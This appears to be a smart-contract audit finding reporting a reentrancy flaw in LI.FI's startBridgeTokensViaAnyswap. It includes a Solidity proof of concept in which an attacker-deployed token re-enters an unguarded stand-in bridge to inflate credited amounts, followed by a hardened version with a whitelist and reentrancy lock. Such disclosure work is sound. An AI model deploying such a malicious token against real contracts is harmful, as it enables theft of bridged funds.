Lines of code
https://github.com/code-423n4/2022-03-lifinance/blob/main/src/Facets/AnyswapFacet.sol#L35-L66
Vulnerability details
Impact
Without a token whitelist or a reentrancy lock, startBridgeTokensViaAnyswap is exposed to reentrancy through an attacker-supplied token contract.
Proof of Concept
startBridgeTokensViaAnyswap does not check the token address against a whitelist, and the contract has no reentrancy lock. The function calls LibAsset.transferFromERC20 on that caller-supplied token, which invokes the token's transferFrom. An attacker can therefore deploy a malicious ERC20 whose transferFrom re-enters startBridgeTokensViaAnyswap before the first call has completed.
Tools Used
Recommended Mitigation Steps
Restrict startBridgeTokensViaAnyswap to whitelisted token addresses and protect the function with a reentrancy lock (for example a nonReentrant modifier).
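The following is an added example, not code from the LI.FI repository. It uses a hypothetical stand-in for the facet (UnguardedBridge.startBridge in place of startBridgeTokensViaAnyswap, with an inline transferFrom call in place of LibAsset.transferFromERC20) to show the attack path the finding describes, and a GuardedBridge stand-in that adds the whitelist and lock recommended above. The assumption carried over from the finding is that the token address is caller-controlled and the external transferFrom call happens before the function's bookkeeping finishes.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IBridge {
    function startBridge(address token, uint256 amount) external;
}

// Hypothetical stand-in for the unguarded facet: caller-supplied token, no whitelist, no lock.
contract UnguardedBridge is IBridge {
    uint256 public depth;    // current nesting of startBridge on the call stack
    uint256 public maxDepth; // deepest nesting seen; anything above 1 proves re-entry
    uint256 public bridged;  // amount credited as bridged

    function startBridge(address token, uint256 amount) external override {
        depth += 1;
        if (depth > maxDepth) maxDepth = depth;
        // External call into caller-chosen code before the bookkeeping below.
        require(IERC20(token).transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        bridged += amount;
        depth -= 1;
    }
}

// Attacker-deployed "ERC20": transferFrom moves nothing and re-enters the bridge.
contract MaliciousToken is IERC20 {
    IBridge public immutable target;
    uint256 public reenters;
    uint256 public constant MAX_REENTERS = 3; // bound so the demo terminates

    constructor(IBridge _target) { target = _target; }

    function transferFrom(address, address, uint256 amount) external override returns (bool) {
        if (reenters < MAX_REENTERS) {
            reenters += 1;
            target.startBridge(address(this), amount); // re-enter before the outer call completes
        }
        return true;
    }
}

// Hardened stand-in: token whitelist plus a reentrancy lock.
contract GuardedBridge is IBridge {
    address public immutable owner;
    mapping(address => bool) public allowedToken;
    uint256 private locked = 1; // 1 = unlocked, 2 = locked
    uint256 public bridged;

    constructor() { owner = msg.sender; }

    modifier nonReentrant() {
        require(locked == 1, "reentrancy");
        locked = 2;
        _;
        locked = 1;
    }

    function setAllowedToken(address token, bool allowed) external {
        require(msg.sender == owner, "not owner");
        allowedToken[token] = allowed;
    }

    function startBridge(address token, uint256 amount) external override nonReentrant {
        require(allowedToken[token], "token not whitelisted");
        require(IERC20(token).transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        bridged += amount;
    }
}

// Drives both scenarios; deploy and call run() in Remix or from a Foundry test.
contract Demo {
    function run()
        external
        returns (uint256 unguardedDepth, string memory whitelistReason, string memory lockReason)
    {
        UnguardedBridge weak = new UnguardedBridge();
        MaliciousToken evil = new MaliciousToken(weak);
        weak.startBridge(address(evil), 1 ether);
        unguardedDepth = weak.maxDepth(); // 4: the outer call plus three nested re-entries

        GuardedBridge strong = new GuardedBridge();
        MaliciousToken evil2 = new MaliciousToken(strong);
        // Unknown token: rejected by the whitelist before any external call is made.
        try strong.startBridge(address(evil2), 1 ether) { whitelistReason = "no revert"; }
        catch Error(string memory reason) { whitelistReason = reason; } // "token not whitelisted"

        // Even a whitelisted token that turns malicious is stopped by the lock.
        strong.setAllowedToken(address(evil2), true);
        try strong.startBridge(address(evil2), 1 ether) { lockReason = "no revert"; }
        catch Error(string memory reason) { lockReason = reason; } // "reentrancy"
    }
}
```

In the unguarded case the nested call stack reaches depth 4 and bridged is credited four times for a transferFrom that moved nothing. In the guarded case the nested call reverts inside the lock, the revert bubbles up through the token's transferFrom, and the outer call fails as a whole, so no partial bookkeeping survives.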